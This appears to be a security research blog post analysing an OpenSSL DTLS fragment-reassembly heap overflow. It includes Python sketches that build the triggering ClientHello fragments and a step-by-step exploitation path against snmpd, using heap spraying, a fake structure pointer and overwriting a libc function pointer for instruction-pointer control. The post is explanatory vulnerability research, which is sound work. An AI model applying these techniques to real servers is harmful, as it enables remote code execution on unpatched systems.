Earlier this year, details of a remote code execution bug in OpenSSL’s DTLS implementation were published. The following is a look at the bug, how it can be triggered and the different ways attackers might leverage it for exploitation.
Vulnerability
At a high level, the bug allows writing past the end of a heap-allocated buffer, so that adjacent application data or heap metadata can be overwritten. This leads to application crashes or, at worst, remote code execution.
The bug is due to the way the OpenSSL DTLS parser handles fragmented handshakes. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message.
Consider the following fragmented ClientHello message that triggers the bug:
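As a rough sketch of what the two fragments look like on the wire, the snippet below packs the 12-byte DTLS handshake header (message type, 24-bit message length, message sequence, 24-bit fragment offset, 24-bit fragment length) in front of each one-byte body. The record layer is left out, the class and function names are my own, and the message length of 3 in the second fragment is an assumption: it is simply the smallest value that lets offset 2 plus length 1 pass the range check.

```python
from typing import NamedTuple

CLIENT_HELLO = 1  # handshake message type for ClientHello


class HandshakeFragment(NamedTuple):
    msg_type: int
    msg_len: int   # total message length claimed by this fragment
    msg_seq: int
    frag_off: int  # offset of this fragment inside the message
    frag_len: int  # number of body bytes carried by this fragment
    body: bytes


def pack_fragment(f: HandshakeFragment) -> bytes:
    """Serialize the 12-byte handshake header followed by the fragment body."""
    return (
        f.msg_type.to_bytes(1, "big")
        + f.msg_len.to_bytes(3, "big")
        + f.msg_seq.to_bytes(2, "big")
        + f.frag_off.to_bytes(3, "big")
        + f.frag_len.to_bytes(3, "big")
        + f.body
    )


def unpack_fragment(data: bytes) -> HandshakeFragment:
    """Parse a handshake header and body produced by pack_fragment()."""
    frag_len = int.from_bytes(data[9:12], "big")
    return HandshakeFragment(
        msg_type=data[0],
        msg_len=int.from_bytes(data[1:4], "big"),
        msg_seq=int.from_bytes(data[4:6], "big"),
        frag_off=int.from_bytes(data[6:9], "big"),
        frag_len=frag_len,
        body=data[12:12 + frag_len],
    )


# First fragment: claims a 2-byte message and carries "A" at offset 0.
first = HandshakeFragment(CLIENT_HELLO, 2, 0, 0, 1, b"A")
# Second fragment: claims a 3-byte message (assumed) and carries "B" at offset 2.
second = HandshakeFragment(CLIENT_HELLO, 3, 0, 2, 1, b"B")
```

The only difference that matters between the two headers is the message length field, which is exactly what the parser fails to compare.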
When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data “A” (fragment offset = 0, fragment length = 1) is written to the message buffer:
Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length are checked to determine whether they are within the range of the message length:
Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data “B” (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer:
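The walk-through above can be reproduced with a toy model. This is not OpenSSL code: the class name, the return strings and the check_against_first switch are all made up for illustration, and the stricter check is only one possible way of closing the gap, not necessarily the fix that was shipped. The model records writes in a dictionary so that nothing is actually corrupted.

```python
class ReassemblyModel:
    """Toy model of the reassembly logic described in the text."""

    def __init__(self, check_against_first: bool = False):
        self.buffer_len = None  # fixed by the first fragment's message length
        self.writes = {}        # offset -> byte value, including out-of-bounds ones
        self.check_against_first = check_against_first

    def handle(self, msg_len: int, frag_off: int, frag_len: int, data: bytes) -> str:
        # The buffer is sized once, from the first fragment seen.
        if self.buffer_len is None:
            self.buffer_len = msg_len

        # Flawed behaviour: the range check trusts the current fragment's msg_len.
        limit = self.buffer_len if self.check_against_first else msg_len
        if frag_off + frag_len > limit:
            return "rejected"

        for i, value in enumerate(data[:frag_len]):
            self.writes[frag_off + i] = value

        if frag_off + frag_len > self.buffer_len:
            return "out-of-bounds write"
        return "ok"


vulnerable = ReassemblyModel()
first_result = vulnerable.handle(msg_len=2, frag_off=0, frag_len=1, data=b"A")
second_result = vulnerable.handle(msg_len=3, frag_off=2, frag_len=1, data=b"B")
```

With the flawed check, the second call passes the range test and lands at offset 2 of a 2-byte buffer. Constructing the model with check_against_first=True makes the same second fragment fail the test.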
As you may have observed, the bug is interesting in that an attacker has a relatively high degree of control over where the data is written (fragment offset), what is written (fragment data) and how much is written (fragment length).
Triggering
Now that we have an idea of what the bug is, let’s try to trigger it. For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory.
Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1”; this causes the OpenSSL tool to listen on port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught:
The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()).
DTLS Exploitation
After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This is a great learning experience because it teaches us how attackers think, what their process is and what other weaknesses they might use to fully leverage the bug.
For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS.
Once a target service is running, the next step involves attaching to the process, setting breakpoints on the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. Understanding these later allocations allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk) and are therefore candidates for overwrite.
After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug to a fairly limited “write arbitrary data to the address pointed to by pointers found in the process” exploit primitive:
In the context of DTLS, pitem is a linked list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure:
The hm_fragment structure contains information about the fragmented handshake message state, and more importantly, the message buffer pointer (hm_fragment.fragment).
Every time a handshake fragment is parsed, the related pitem of the handshake is retrieved, pitem.data is cast to a hm_fragment* and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment:
Therefore, by using the bug to point pitem.data somewhere in the process address space such that pitem.(hm_fragment*)data->fragment lines up with an existing pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points.
To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset +0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure. Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer:
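The arithmetic in this example is easy to check with a small model of memory. The dictionary below is a hypothetical snapshot of the process (address mapped to the 64-bit value stored there), the function names are mine, and the 0x58 offset is the one assumed in the text rather than something derived from a header file.

```python
FRAGMENT_OFFSET = 0x58  # offset of hm_fragment.fragment, as assumed in the text

# Hypothetical snapshot of process memory: address -> 64-bit value stored there.
memory = {0x401058: 0x12345678}


def write_destination(pitem_data: int, mem: dict) -> int:
    """Address the parser would treat as the message buffer for this pitem.data."""
    return mem[pitem_data + FRAGMENT_OFFSET]


def pitem_data_for_slot(slot_addr: int) -> int:
    """Value pitem.data must take so that the fragment field overlaps slot_addr."""
    return slot_addr - FRAGMENT_OFFSET


fake_hm_fragment = pitem_data_for_slot(0x401058)
destination = write_destination(fake_hm_fragment, memory)
```

Here fake_hm_fragment works out to 0x401000 and destination to 0x12345678, which matches the example: the parser reads the pointer stored at 0x401058 and copies the attacker's fragment data to wherever it points.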
We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting:
WriteN Primitive
Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141:
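To see why the spray is a repeating series of the address, here is a minimal sketch of the pattern itself (function names are mine, and a little-endian x64 target is assumed). Wherever the guessed heap address lands inside the sprayed region, an 8-byte-aligned read returns the target address; a misaligned guess does not, which is one more reason the hard-coded address is fragile.

```python
import struct


def spray_pattern(target: int, size: int) -> bytes:
    """Repeat the 64-bit little-endian target address to fill roughly size bytes."""
    return struct.pack("<Q", target) * (size // 8)


def read_qword(buf: bytes, offset: int) -> int:
    """Read a 64-bit little-endian value, as a pointer load on x64 would."""
    return struct.unpack_from("<Q", buf, offset)[0]


# A non-uniform, made-up address is used here so that misalignment is visible;
# with 0x4141414141414141 every offset reads back the same value.
target = 0x1122334455667788
pattern = spray_pattern(target, 64)

aligned = [read_qword(pattern, off) for off in range(0, 56, 8)]
misaligned = read_qword(pattern, 1)
```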
As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive:
Execution (RIP) Control
Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000):
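One quick way to tell whether an executable was built as PIE is the e_type field of its ELF header: ET_EXEC (2) means it is linked for a fixed address, while ET_DYN (3) is what position-independent executables use. The following is a minimal sketch with function names of my own; it only looks at the first 18 bytes of the file.

```python
import struct

ET_EXEC = 2  # fixed-address executable
ET_DYN = 3   # shared object or position-independent executable


def elf_type(header: bytes) -> int:
    """Return e_type from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] (EI_DATA) is 1 for little-endian and 2 for big-endian.
    endian = "<" if header[5] == 1 else ">"
    # e_type is the 16-bit field right after the 16-byte e_ident array.
    return struct.unpack_from(endian + "H", header, 16)[0]


def is_position_independent(header: bytes) -> bool:
    """True when the ELF header says the file is ET_DYN."""
    return elf_type(header) == ET_DYN
```

To use it, read the first 18 bytes of the binary in question (wherever snmpd is installed on the test system) and pass them to is_position_independent(). A result of False is consistent with an executable that is always mapped at the same base address.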
Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point. An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd:
In turn, that pointer points somewhere in the writable .data section of libc:
Looking at the data near stderr in libc, we can see that stderr+0x18 holds an interesting function pointer, one that malloc() dereferences when requesting additional memory from the system:
Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved:
Conclusion
After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug.
Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again.
In the end, an attacker’s persistence is what transforms software bugs into working, reliable exploits. As software developers, it is good to keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products.
Security Researcher, IBM X-Force